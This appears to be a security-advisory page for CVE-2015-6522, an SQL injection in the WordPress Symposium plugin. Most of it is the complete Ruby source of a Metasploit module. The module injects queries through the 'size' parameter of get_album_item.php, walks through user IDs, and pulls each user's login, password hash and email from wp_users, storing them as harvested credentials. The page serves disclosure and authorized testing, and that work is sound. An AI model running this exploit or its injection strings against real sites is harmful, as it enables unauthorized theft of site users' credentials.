WordPress Symposium Plugin SQL Injection

Published: 31 Aug 2024 00:00:00
Reported by: Matteo Cantoni, PizzaHatHacker, metasploit.com
Type: packetstorm
Source: packetstormsecurity.com

SQL Injection in WordPress Symposium Plugin allows remote attackers to extract credentials via the size parameter to get_album_item.php.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2015-6522 | 29 May 2018 15:50 | circl |
| CNVD | WordPress WP Symposium Plugin SQL Injection Vulnerability | 20 Aug 2015 00:00 | cnvd |
| Check Point Advisories | WordPress Symposium Plugin SQL Injection (CVE-2015-6522) | 8 Dec 2016 00:00 | checkpoint_advisories |
| CVE | CVE-2015-6522 | 19 Aug 2015 15:00 | cve |
| Cvelist | CVE-2015-6522 | 19 Aug 2015 15:00 | cvelist |
| Metasploit | WordPress Symposium Plugin SQL Injection | 17 Nov 2016 14:04 | metasploit |
| NVD | CVE-2015-6522 | 19 Aug 2015 15:59 | nvd |
| OpenVAS | WordPress WP Symposium Multiple SQL Injection Vulnerabilities | 24 Aug 2015 00:00 | openvas |
| Patchstack | WordPress Symposium Plugin 15.1 - SQL Injection #2 | 18 Aug 2015 00:00 | patchstack |
| Patchstack | WordPress Symposium Plugin <= 15.7- SQL Injection | 19 Aug 2015 00:00 | patchstack |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Symposium Plugin SQL Injection',
        'Description' => %q{
          This module exploits a SQL injection vulnerability in the WP Symposium plugin
          before 15.8 for WordPress, which allows remote attackers to extract credentials
          via the size parameter to get_album_item.php.
        },
        'Author' => [
          'PizzaHatHacker', # Vulnerability discovery
          'Matteo Cantoni <goony[at]nothink.org>' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2015-6522'],
          ['EDB', '37824']
        ],
        'DisclosureDate' => '2015-08-18'
      )
    )

    register_options(
      [
        OptString.new('URI_PLUGIN', [true, 'The WordPress Symposium Plugin URI', 'wp-symposium'])
      ]
    )
  end

  def check
    check_plugin_version_from_readme('wp-symposium', '15.8.0', '15.5.1')
  end

  def uri_plugin
    normalize_uri(wordpress_url_plugins, datastore['URI_PLUGIN'], 'get_album_item.php')
  end

  def send_sql_request(sql_query)
    uri_complete = normalize_uri(uri_plugin)

    begin
      res = send_request_cgi(
        'method' => 'GET',
        'uri' => uri_complete,
        'vars_get' => { 'size' => sql_query }
      )

      return nil if res.nil? || res.code != 200 || res.body.nil?

      res.body
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e
      vprint_error("#{peer} - The host was unreachable!")
      return nil
    end
  end

  def run
    vprint_status("#{peer} - Attempting to connect...")
    vprint_status("#{peer} - Trying to retrieve the first user id...")
    first_id = send_sql_request('id from wp_users order by id asc limit 1 ; --')
    if first_id.nil?
      vprint_error("#{peer} - Failed to retrieve the first user id... Try with check function!")
      return
    else
      vprint_status("#{peer} - First user-id is '#{first_id}'")
    end

    vprint_status("#{peer} - Trying to retrieve the last user id...")
    last_id = send_sql_request('id from wp_users order by id desc limit 1 ; --')
    if last_id.nil?
      vprint_error("#{peer} - Failed to retrieve the last user id")
      return
    else
      vprint_status("#{peer} - Last user-id is '#{last_id}'")
    end

    credentials = ''

    vprint_status("#{peer} - Trying to retrieve the users information...")
    for user_id in first_id..last_id
      separator = Rex::Text.rand_text_numeric(7, bad = '0')
      user_info = send_sql_request("concat_ws(#{separator},user_login,user_pass,user_email) from wp_users where id = #{user_id} ; --")

      if user_info.nil?
        vprint_error("#{peer} - Failed to retrieve the users info")
        return
      else
        values = user_info.split(separator.to_s)

        user_login = values[0]
        user_pass = values[1]
        user_email = values[2]

        print_good("#{peer} - #{sprintf('%-15s %-34s %s', user_login, user_pass, user_email)}")
        connection_details = {
          module_fullname: fullname,
          username: user_login,
          private_data: user_pass,
          private_type: :nonreplayable_hash,
          status: Metasploit::Model::Login::Status::UNTRIED,
          proof: user_email
        }.merge(service_details)
        create_credential(connection_details)

        credentials << "#{user_login},#{user_pass},#{user_email}\n"
      end
    end

    unless credentials.empty?
      loot = store_loot('wp_symposium.http', 'text/plain', rhost, credentials)
      vprint_good("Credentials saved in: #{loot}")
    end
  end
end
```
